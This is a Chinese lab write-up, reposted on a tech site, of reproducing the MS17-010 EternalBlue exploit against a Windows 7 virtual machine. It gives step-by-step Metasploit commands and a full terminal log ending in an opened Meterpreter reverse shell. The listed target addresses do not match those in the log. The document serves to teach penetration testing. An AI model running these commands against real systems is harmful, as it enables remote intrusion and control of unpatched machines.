admin 管理员组文章数量: 887016
一、实验项目名称
Windows网络服务渗透测试实战MS17-010漏洞复现
二、实验目的及要求
熟悉Metasploit终端的使用方法;
掌握对MS17-010漏洞攻击的方法。
三、复现步骤(附加文字说明加截图)
1、NAT模式
Kali-Linux :192.168.232.141
Windows 7: 192.168.232.142
2、查看ip
kali:ip a
win7:ipconfig
3、重启网卡
service networking restart
4、测试是否连通
kali:ping 192.168.237.150
5、进入msf平台
msfconsole
6、搜索漏洞模块
search ms17-010
7、使用扫描模块
use auxiliary/scanner/smb/smb_ms17_010
8、查看选项
show options
9、设置
set rhost 192.168.237.150
set rport 445
10、验证
run
exploit
11、使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
12、查看选项
show options
13、设置
set lhost 192.168.237.132
set lport 4444
set rhost 192.168.237.150
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
14、攻击
run
──(kali㉿kali)-[~/Desktop]
└─$ ip a 148 ⨯ 1 ⚙
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.232.141/24 brd 192.168.232.255 scope global dynamic noprefixroute eth0
valid_lft 1753sec preferred_lft 1753sec
inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 192.168.232.142 1 ⚙
PING 192.168.232.142 (192.168.232.142) 56(84) bytes of data.
64 bytes from 192.168.232.142: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.232.142: icmp_seq=2 ttl=128 time=1.19 ms
64 bytes from 192.168.232.142: icmp_seq=3 ttl=128 time=0.565 ms
64 bytes from 192.168.232.142: icmp_seq=4 ttl=128 time=0.367 ms
64 bytes from 192.168.232.142: icmp_seq=5 ttl=128 time=0.487 ms
64 bytes from 192.168.232.142: icmp_seq=6 ttl=128 time=0.658 ms
64 bytes from 192.168.232.142: icmp_seq=7 ttl=128 time=0.346 ms
64 bytes from 192.168.232.142: icmp_seq=8 ttl=128 time=0.556 ms
^Z
zsh: suspended ping 192.168.232.142
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole 148 ⨯ 2 ⚙
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Start commands with a space to avoid saving
them to history
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/ yes List of named pipes to check
data/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see https://github/rapid7/metasplo
it-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_et
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms17_010_eternalblue
[*] Using exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Win
dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 20
08 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.232.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.232.141
lhost => 192.168.232.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.232.141:4444
[*] 192.168.232.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.232.142:445 - The target is vulnerable.
[*] 192.168.232.142:445 - Connecting to target for exploitation.
[+] 192.168.232.142:445 - Connection established for exploitation.
[+] 192.168.232.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.232.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.232.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.232.142:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.232.142:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.232.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.232.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.232.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.232.142:445 - Starting non-paged pool grooming
[+] 192.168.232.142:445 - Sending SMBv2 buffers
[+] 192.168.232.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.232.142:445 - Sending final SMBv2 buffers.
[*] 192.168.232.142:445 - Sending last fragment of exploit packet!
[*] 192.168.232.142:445 - Receiving response from exploit packet
[+] 192.168.232.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.232.142:445 - Sending egg to corrupted connection.
[*] 192.168.232.142:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.232.142
[*] Meterpreter session 1 opened (192.168.232.141:4444 -> 192.168.232.142:49717) at 2022-05-16 05:22:53 -0400
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:0c:d1:dc
MTU : 1500
IPv4 Address : 192.168.232.142
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6d7a:d608:7ec3:80e
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:e88e
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
Interface 15
============
Name : Bluetooth vc6
Hardware MAC : c0:3c:59:b9:be:40
MTU : 1500
IPv4 Address : 169.254.121.120
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::2898:c717:bd6d:7978
IPv6 Netmask : ffff:ffff:ffff:ffff::版权声明:本文标题:Windows网络服务渗透测试实战MS17-010漏洞复现 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727509593h1126996.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论